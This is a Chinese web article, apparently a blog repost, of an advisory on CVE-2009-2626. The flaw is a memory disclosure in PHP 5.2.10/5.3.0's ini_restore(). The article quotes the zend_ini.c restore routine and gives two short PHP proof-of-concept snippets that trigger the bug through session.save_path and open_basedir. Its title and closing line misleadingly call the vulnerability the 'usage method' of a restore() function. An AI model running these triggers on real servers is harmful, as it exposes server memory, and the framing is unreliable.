PHP函數(shù)restore()重置PHP配置環(huán)境
作者:佚名
我們可以運(yùn)用PHP函數(shù)restore()重置PHP配置環(huán)境時(shí)PG()類中的變量會(huì)顯示任意部分的內(nèi)存。我們給出了詳細(xì)的使用方法,希望對(duì)大家有所幫助。
PHP作為一種功能強(qiáng)大的HTML嵌入式語(yǔ)言受到廣泛的運(yùn)用,尤其適合于WEB開(kāi)發(fā)中。下面我們將為大家詳細(xì)介紹有關(guān)PHP函數(shù)restore()的相關(guān)用法。#t#
影響版本:
PHP PHP 5.3.0
PHP PHP 5.2.10漏洞描述:
BUGTRAQ ID: 36009
CVE ID: CVE-2009-2626
在使用PHP函數(shù)restore()重置PHP配置環(huán)境時(shí)PG()類中的變量會(huì)顯示任意部分的內(nèi)存。如果要利用這個(gè)漏洞,攻擊者必須要通過(guò)ini_set()函數(shù)聲明變量。
- ---zend_ini.c---
- static int zend_restore_ini_entry_cb
(zend_ini_entry *ini_entry, int stage- TSRMLS_DC) /* {{{ */
- {
- if (ini_entry->modified) {
- if (ini_entry->on_modify) {
- zend_try {
- /* even if on_modify bails out, we
have to continue on with restoring,- since there can be allocated variables
that would be freed on MM- shutdown
- and would lead to memory corruption
later ini entry is modified again- */
- ini_entry->on_modify(ini_entry,
ini_entry->orig_value,- ini_entry->orig_value_length,
ini_entry->mh_arg1, ini_entry->mh_arg2,- ini_entry->mh_arg3, stage TSRMLS_CC);
- } zend_end_try();
- }
- if (ini_entry->value != ini_entry
->orig_value) {- efree(ini_entry->value);
- }
- ini_entry->value = ini_entry->
orig_value;- ini_entry->value_length =
ini_entry->orig_value_length;- ini_entry->modified = 0;
- ini_entry->orig_value = NULL;
- ini_entry->orig_value_length = 0;
- if (ini_entry->modifiable >= (1 << 3)) {
- ini_entry->modifiable >>= 3;
- }
- }
- return 0;
- }
- ---zend_ini.c---
PHP函數(shù)restore()所修改的標(biāo)記會(huì)被重置。由于沒(méi)有檢查ini_entry->on_modify()的值,PG()會(huì)超出內(nèi)存范圍。
PHP函數(shù)restore()測(cè)試方法:
本站提供程序(方法)可能帶有攻擊性,僅供安全研究與教學(xué)之用,風(fēng)險(xiǎn)自負(fù)!
- < ?php
- ini_set("session.save_path",
"0123456789ABCDEF");- ini_restore("session.save_path");
- session_start();
- ?>
- < ?php
- ini_set("open_basedir", "A");
- ini_restore("open_basedir");
- ini_get("open_basedir");
- include("B");
- ?>
以上就是PHP函數(shù)restore()的相關(guān)使用方法。
責(zé)任編輯:曹凱
來(lái)源:
百度博客
